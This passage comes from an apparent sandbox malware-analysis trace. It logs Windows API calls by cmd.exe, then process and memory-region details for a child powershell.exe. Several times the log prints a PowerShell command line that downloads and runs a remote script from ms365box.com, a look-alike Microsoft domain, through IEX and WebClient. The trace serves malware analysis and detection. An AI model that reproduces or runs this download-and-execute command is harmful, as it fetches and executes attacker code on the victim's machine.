lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x0, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegCloseKey (hKey=0x44) returned 0x0 [0125.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e808 | out: phkResult=0x18e808*=0x44) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x40, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, 
lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x0, lpcbData=0x18e804*=0x4) returned 0x0 [0125.504] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x9, lpcbData=0x18e804*=0x4) returned 0x0 [0125.504] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x9, lpcbData=0x18e804*=0x4) returned 0x0 [0125.504] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x9, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.504] RegCloseKey (hKey=0x44) returned 0x0 [0125.504] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8801c3 [0125.504] srand (_Seed=0x5b8801c3) [0125.504] GetCommandLineW () returned="CMD.EXE /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" [0125.504] GetCommandLineW () returned="CMD.EXE /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" [0125.504] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a06c0a0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f 
[0125.504] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cad00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\CMD.EXE" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0125.505] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0125.505] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.505] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.505] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0125.505] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0125.505] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0125.505] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0125.505] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0125.505] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0125.505] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0125.505] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0125.505] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0125.505] GetEnvironmentStringsW () returned 0x2c8c50* [0125.506] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0125.506] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.506] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.506] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0125.506] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0125.506] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0125.506] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0125.506] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0125.506] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0125.506] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0125.506] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0125.506] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f610 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f [0125.506] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x104, lpBuffer=0x18f610, lpFilePart=0x18f5f0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x18f5f0*="Desktop") returned 0x1f [0125.507] GetFileAttributesW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop")) returned 0x11 [0125.507] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f320 | out: lpFindFileData=0x18f320) returned 0x2cc550 [0125.507] FindClose (in: hFindFile=0x2cc550 | out: hFindFile=0x2cc550) returned 1 [0125.507] FindFirstFileW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", lpFindFileData=0x18f320 | out: lpFindFileData=0x18f320) returned 0x2cc550 [0125.508] FindClose (in: hFindFile=0x2cc550 | out: hFindFile=0x2cc550) returned 1 [0125.508] _wcsnicmp (_String1="ADU0VK~1", _String2="aDU0VK IWA5kLS", _MaxCount=0xe) returned 94 [0125.508] FindFirstFileW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFindFileData=0x18f320 | out: lpFindFileData=0x18f320) returned 0x2cc550 [0125.508] FindClose (in: hFindFile=0x2cc550 | out: hFindFile=0x2cc550) returned 1 [0125.508] GetFileAttributesW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop")) returned 0x11 [0125.508] SetCurrentDirectoryW (lpPathName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop")) returned 1 [0125.508] SetEnvironmentVariableW 
(lpName="=C:", lpValue="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 1 [0125.508] GetEnvironmentStringsW () returned 0x2cba00* [0125.508] FreeEnvironmentStringsW (penv=0x2cba00) returned 1 [0125.508] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a06c0a0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f [0125.509] GetConsoleOutputCP () returned 0x1b5 [0125.509] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a06bfe0 | out: lpCPInfo=0x4a06bfe0) returned 1 [0125.509] GetUserDefaultLCID () returned 0x409 [0125.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a067b50, cchData=8 | out: lpLCData=":") returned 2 [0125.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f720, cchData=128 | out: lpLCData="0") returned 2 [0125.512] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f720, cchData=128 | out: lpLCData="0") returned 2 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f720, cchData=128 | out: lpLCData="1") returned 2 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a07a740, cchData=8 | out: lpLCData="/") returned 2 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a07a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a07a460, cchData=32 | out: lpLCData="Tue") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a07a420, cchData=32 | out: lpLCData="Wed") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a07a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a07a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a07a360, cchData=32 | out: lpLCData="Sat") returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a07a700, cchData=32 | out: lpLCData="Sun") 
returned 4 [0125.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a067b40, cchData=8 | out: lpLCData=".") returned 2 [0125.514] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a07a4e0, cchData=8 | out: lpLCData=",") returned 2 [0125.514] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0125.515] GetConsoleTitleW (in: lpConsoleTitle=0x2c9910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\CMD.EXE") returned 0x1b [0125.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77930000 [0125.515] GetProcAddress (hModule=0x77930000, lpProcName="CopyFileExW") returned 0x779423d0 [0125.515] GetProcAddress (hModule=0x77930000, lpProcName="IsDebuggerPresent") returned 0x77938290 [0125.515] GetProcAddress (hModule=0x77930000, lpProcName="SetConsoleInputExeNameW") returned 0x779417e0 [0125.519] _wcsicmp (_String1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", _String2=")") returned 58 [0125.520] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 3 [0125.520] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 3 [0125.520] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 6 [0125.520] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 6 [0125.520] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 15 [0125.520] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 15 [0125.524] GetConsoleTitleW (in: lpConsoleTitle=0x18f630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\CMD.EXE") returned 0x1b [0125.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.525] 
GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1c0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1a0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1a0*=0xfcdf19fa, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0125.526] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0125.526] SetErrorMode (uMode=0x0) returned 0x8001 [0125.526] SetErrorMode (uMode=0x1) returned 0x0 [0125.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\.", nBufferLength=0x208, lpBuffer=0x2b1330, lpFilePart=0x18eec0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x18eec0*="v1.0") returned 0x2a [0125.527] SetErrorMode (uMode=0x8001) returned 0x1 [0125.527] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\.") returned 1 [0125.527] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a05f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.547] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.547] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", fInfoLevelId=0x1, lpFindFileData=0x18ec30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec30) returned 0x2ca170 [0125.550] FindClose (in: hFindFile=0x2ca170 | out: hFindFile=0x2ca170) returned 1 [0125.551] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0125.551] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0125.551] GetConsoleTitleW (in: lpConsoleTitle=0x18f180, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\CMD.EXE") returned 0x1b [0125.551] InitializeProcThreadAttributeList (in: lpAttributeList=0x18ef38, dwAttributeCount=0x1, dwFlags=0x0, 
lpSize=0x18eef8 | out: lpAttributeList=0x18ef38, lpSize=0x18eef8) returned 1 [0125.551] UpdateProcThreadAttribute (in: lpAttributeList=0x18ef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x18eee8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18ef38, lpPreviousValue=0x0) returned 1 [0125.552] GetStartupInfoW (in: lpStartupInfo=0x18f050 | out: lpStartupInfo=0x18f050*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\CMD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0125.552] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0125.553] _wcsnicmp (_String1="COPYCMD", 
_String2="NUMBER_", _MaxCount=0x7) returned -11 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0125.553] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0125.554] _wcsnicmp (_String1="COPYCMD", 
_String2="USERPRO", _MaxCount=0x7) returned -18 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0125.554] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0125.554] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0125.556] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpStartupInfo=0x18ef70*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef20 | out: lpCommandLine="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))", lpProcessInformation=0x18ef20*(hProcess=0x54, hThread=0x50, dwProcessId=0xbf8, dwThreadId=0xbfc)) returned 1 [0126.361] CloseHandle (hObject=0x50) returned 1 [0126.361] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0126.361] GetEnvironmentStringsW () returned 0x2c8c50* [0126.361] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0126.361] WaitForSingleObject (hHandle=0x54, 
dwMilliseconds=0xffffffff) returned 0x0 [0152.659] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18ee68 | out: lpExitCode=0x18ee68*=0x0) returned 1 [0152.659] CloseHandle (hObject=0x54) returned 1 [0152.659] _vsnwprintf (in: _Buffer=0x18f0d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ee78 | out: _Buffer="00000000") returned 8 [0152.659] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0152.660] GetEnvironmentStringsW () returned 0x2cf010* [0152.660] FreeEnvironmentStringsW (penv=0x2cf010) returned 1 [0152.660] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.660] GetEnvironmentStringsW () returned 0x2cf010* [0152.660] FreeEnvironmentStringsW (penv=0x2cf010) returned 1 [0152.660] DeleteProcThreadAttributeList (in: lpAttributeList=0x18ef38 | out: lpAttributeList=0x18ef38) [0152.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.660] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a05e194 | out: lpMode=0x4a05e194) returned 1 [0152.661] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.661] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a05e198 | out: lpMode=0x4a05e198) returned 1 [0152.661] SetConsoleInputExeNameW () returned 0x1 [0152.661] GetConsoleOutputCP () returned 0x1b5 [0152.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a06bfe0 | out: lpCPInfo=0x4a06bfe0) returned 1 [0152.661] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0152.661] exit (_Code=0) Process: id = "3" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x25819000" os_pid = "0xbf8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xbe0" cmd_line = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX 
((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 669 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 670 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 671 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 672 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 673 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 674 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 675 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 676 start_va = 0x13f120000 end_va = 0x13f196fff entry_point = 0x13f120000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 677 start_va = 
0x7feffe70000 end_va = 0x7feffe70fff entry_point = 0x7feffe70000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 678 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 679 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 680 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 681 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 682 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x77930000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 683 start_va = 0x7fefdd20000 end_va = 0x7fefdd8afff entry_point = 0x7fefdd20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 684 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 685 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 686 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 687 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 
